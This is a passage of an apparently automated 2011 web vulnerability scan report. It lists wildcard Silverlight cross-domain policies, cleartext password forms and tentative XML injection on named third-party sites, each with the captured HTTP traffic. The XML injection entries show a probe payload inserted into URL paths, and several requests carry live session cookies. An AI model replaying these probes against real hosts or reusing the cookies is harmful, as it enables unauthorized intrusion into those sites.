<grant-to>
<resource
...[SNIP]...
7.6. http://o.sa.aol.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.sa.aol.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: o.sa.aol.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:35:54 GMT
Server: Omniture DC/2.0.0
xserver: www377
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
7.7. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Fri, 25 Mar 2011 02:49:17 GMT
Expires: Sat, 26 Mar 2011 02:49:17 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 59040

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
7.8. http://secure-us.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:18 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Sat, 02 Apr 2011 20:36:18 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...
7.9. http://www.aol.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aol.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:35:51 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 314
Keep-Alive: timeout=5, max=37
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
7.10. http://ts1.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts1.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts1.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Sat, 26 Mar 2011 20:36:09 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...
7.11. http://ts2.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts2.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts2.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Sat, 26 Mar 2011 20:36:08 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...
8. Cleartext submission of password  previous  next
There are 7 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

8.1. http://forums.smartertools.com/login.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.smartertools.com
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login.aspx?ReturnUrl=%2fAddPost.aspx%3fReplyToPostID%3d94084%26Quote%3dFalse HTTP/1.1
Host: forums.smartertools.com
Proxy-Connection: keep-alive
Referer: http://forums.smartertools.com/t/33244.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=85202318.1300554584.2.2.utmcsr=help.smartertools.com|utmccn=(referral)|utmcmd=referral|utmcct=/SmarterMail/v8/Topics/Default.aspx; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; CommunityServer-LastVisitUpdated-2570=; __utma=85202318.1655160661.1300151775.1300736103.1301157836.5; __utmc=85202318; __utmb=85202318.5.10.1301157836; CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:45:07 GMT; CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.31113.47
Set-Cookie: CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:45:08 GMT; expires=Sun, 25-Mar-2012 16:45:08 GMT; path=/
Set-Cookie: CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; expires=Sat, 26-Mar-2011 17:05:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:45:08 GMT
Content-Length: 11933


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<body>
       <form name="aspnetForm" method="post" action="/login.aspx?ReturnUrl=%2fAddPost.aspx%3fReplyToPostID%3d94084%26Quote%3dFalse" id="aspnetForm">
<div>
...[SNIP]...
<td class="CommonFormField">
                    <input name="ctl00$bcr$ctl00$ctl03$password" type="password" maxlength="64" size="11" id="ctl00_bcr_ctl00_ctl03_password" class="CommonTextBig" onkeydown="return KeyDownHandlerctl00_bcr_ctl00_ctl03_loginButton(event);" />
                    <span class="txt4">
...[SNIP]...
8.2. http://www.fast-report.com/en/buy/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/buy/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en/buy/ HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A18

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:41:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2F; expires=Tue, 05-Apr-2011 11:41:20 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:41:21 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A21; expires=Tue, 20-Mar-2012 11:41:21 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 18472

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
<td valign="top">

<form method="post" target="_top" action="/en/buy/index.php?login=yes"><input type="hidden" name="AUTH_FORM" value="Y">
...[SNIP]...
<input type="text" name="USER_LOGIN" value="" class="input-small">&nbsp;&nbsp;<input type="password" name="USER_PASSWORD" class="input-small">&nbsp;&nbsp;</td>
...[SNIP]...
8.3. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/buy/order-FASTREPORT.NET.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en/buy/order-FASTREPORT.NET.html HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2F; PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A19

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:41:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2F; expires=Tue, 05-Apr-2011 11:41:29 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:41:31 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A31; expires=Tue, 20-Mar-2012 11:41:31 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 29289

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
<td valign="top">

<form method="post" target="_top" action="/en/auth.php?en%2Fbuy%2Forder-FASTREPORT_NET_html=&login=yes"><input type='hidden' name='backurl' value='/en/buy/order-FASTREPORT.NET.html'>
...[SNIP]...
<input type="text" name="USER_LOGIN" value="" class="input-small">&nbsp;&nbsp;<input type="password" name="USER_PASSWORD" class="input-small">&nbsp;&nbsp;</td>
...[SNIP]...
8.4. http://www.fast-report.com/en/download/fastreport.net-download.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/download/fastreport.net-download.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en/download/fastreport.net-download.html HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A20

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:30:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:30:30 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A30; expires=Tue, 20-Mar-2012 16:30:30 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 20098

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
<td valign="top">

<form method="post" target="_top" action="/en/auth.php?en%2Fdownload%2Ffastreport_net-download_html=&login=yes"><input type='hidden' name='backurl' value='/en/download/fastreport.net-download.html'>
...[SNIP]...
<input type="text" name="USER_LOGIN" value="" class="input-small">&nbsp;&nbsp;<input type="password" name="USER_PASSWORD" class="input-small">&nbsp;&nbsp;</td>
...[SNIP]...
8.5. http://www.fast-report.com/en/download/fastreport.net-download.html/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/download/fastreport.net-download.html/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en/download/fastreport.net-download.html/? HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/products/FastReport.Net.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A31

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:30:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fproducts%2FFastReport.Net.html; expires=Tue, 05-Apr-2011 16:30:40 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:30:42 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A42; expires=Tue, 20-Mar-2012 16:30:42 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 20062

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
<td valign="top">

<form method="post" target="_top" action="/en/auth.php?login=yes"><input type='hidden' name='backurl' value='/en/download/fastreport.net-download.html/index.php'>
...[SNIP]...
<input type="text" name="USER_LOGIN" value="" class="input-small">&nbsp;&nbsp;<input type="password" name="USER_PASSWORD" class="input-small">&nbsp;&nbsp;</td>
...[SNIP]...
8.6. http://www.fast-report.com/en/products/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/products/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en/products/ HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A28

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:41:31 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2Forder-FASTREPORT.NET.html; expires=Tue, 05-Apr-2011 11:41:31 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:41:34 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A34; expires=Tue, 20-Mar-2012 11:41:34 GMT; path=/
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2Forder-FASTREPORT.NET.html; expires=Tue, 05-Apr-2011 11:41:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 26652

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
<td valign="top">

<form method="post" target="_top" action="/en/products/index.php?login=yes"><input type="hidden" name="AUTH_FORM" value="Y">
...[SNIP]...
<input type="text" name="USER_LOGIN" value="" class="input-small">&nbsp;&nbsp;<input type="password" name="USER_PASSWORD" class="input-small">&nbsp;&nbsp;</td>
...[SNIP]...
8.7. http://www.fast-report.com/en/products/FastReport.Net.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/products/FastReport.Net.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en/products/FastReport.Net.html HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2F; PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A20

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:30:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:30:29 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A29; expires=Tue, 20-Mar-2012 16:30:29 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 19540

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
<td valign="top">

<form method="post" target="_top" action="/en/auth.php?en%2Fproducts%2FFastReport_Net_html=&login=yes"><input type='hidden' name='backurl' value='/en/products/FastReport.Net.html'>
...[SNIP]...
<input type="text" name="USER_LOGIN" value="" class="input-small">&nbsp;&nbsp;<input type="password" name="USER_PASSWORD" class="input-small">&nbsp;&nbsp;</td>
...[SNIP]...
9. XML injection  previous  next
There are 2 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.

9.1. http://use.typekit.com/k/lvr1wgh-b.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://use.typekit.com
Path:   /k/lvr1wgh-b.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /k]]>>/lvr1wgh-b.css?3bb2a6e53c9684ffdc9a9afe195b2a6290e57de54ffd90397ef00df106bb58c0ad0fc682e0a5cc8f85d1c87f5256e0cc83fca38f519a4d0b526f1db5d318cd58d3c860823f76a926db0abb1ee80100663f2923 HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
Referer: http://www.cramerdev.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=300
Content-Type: text/html
Date: Fri, 25 Mar 2011 19:25:35 GMT
Expires: Fri, 25 Mar 2011 19:30:35 GMT
Server: EOS (lax001/283C)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
9.2. http://use.typekit.com/k/lvr1wgh-b.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://use.typekit.com
Path:   /k/lvr1wgh-b.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /k/lvr1wgh-b.css]]>>?3bb2a6e53c9684ffdc9a9afe195b2a6290e57de54ffd90397ef00df106bb58c0ad0fc682e0a5cc8f85d1c87f5256e0cc83fca38f519a4d0b526f1db5d318cd58d3c860823f76a926db0abb1ee80100663f2923 HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
Referer: http://www.cramerdev.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=300
Content-Type: text/html
Date: Fri, 25 Mar 2011 19:25:41 GMT
Expires: Fri, 25 Mar 2011 19:30:41 GMT
Server: EOS (lax001/54E5)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
